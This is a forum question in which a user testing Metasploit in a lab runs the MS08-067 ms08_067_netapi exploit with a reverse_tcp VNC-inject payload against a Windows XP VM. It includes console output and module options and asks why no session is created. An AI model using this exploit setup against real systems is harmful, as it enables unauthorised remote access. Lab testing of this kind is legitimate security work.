AnsweredAssumed Answered

Windows XP crash after exploit

Question asked by eagleeye on Jan 12, 2012
Latest reply on Jan 14, 2012 by opsec



I'm testing out metasploit for my company and I have been going through a few tutorials on However I can't seem to get an exploit to work. I scanned my Windows XP SP1 VMWare machine with nessus and have confirmed that a "MS08-067 Microsoft Windows Server Service Crafted RPC Request Handling..." exploit exists. On my windows machine I then disabled the firewall and opened up port 445.


On my ubuntu VMWare I chose "exploit/windows/smb/ms08_067_netapi" with the following payloads:



and a few others.


I set the LHost, the RHOST and then run exploit. I usually get these messages:


[*] Started reverse handler on

[-] Exploit exception: Login Failed: Connection reset by peer

[*] Exploit completed, but no session was created.


[*] Started bind handler

[-] Exploit exception: The connection was refused by the remote host (

[*] Exploit completed, but no session was created.


[*] Started reverse handler on

[*] Automatically detecting the target...

[*] Fingerprint: Windows XP - Service Pack 3 - lang:Unknown

[*] We could not detect the language pack, defaulting to English

[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)

[*] Attempting to trigger the vulnerability...

[*] Exploit completed, but no session was created.


When I get as far as the "Exploit completed, but no session was created." one... my windows Xp box brings up this error:

"Generic Host Process for Win32 Services has encountered a problem and needs to close..."


I know that this has been asked a lot on the web but I can't seem to find a straight answer that works. I scanned using nessus to make sure that machine is exploitable, the windows xp box has only SP1, I disbaled  the firewall, I opened ports.... what am I missing?


Here are my options:

msf  exploit(ms08_067_netapi) > show options


Module options (exploit/windows/smb/ms08_067_netapi):


   Name     Current Setting  Required  Description

   ----     ---------------  --------  -----------

   RHOST  yes       The target address

   RPORT    445              yes       Set the SMB service port

   SMBPIPE  browser          yes       The pipe name to use (BROWSER, SRVSVC)



Payload options (windows/vncinject/reverse_tcp):


   Name      Current Setting  Required  Description

   ----      ---------------  --------  -----------

   AUTOVNC   true             yes       Automatically launch VNC viewer if present

   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none

   LHOST  yes       The listen address

   LPORT     4444             yes       The listen port

   VNCHOST        yes       The local host to use for the VNC proxy

   VNCPORT   5900             yes       The local port to use for the VNC proxy



Exploit target:


   Id  Name

   --  ----

   0   Automatic Targeting


Thank you!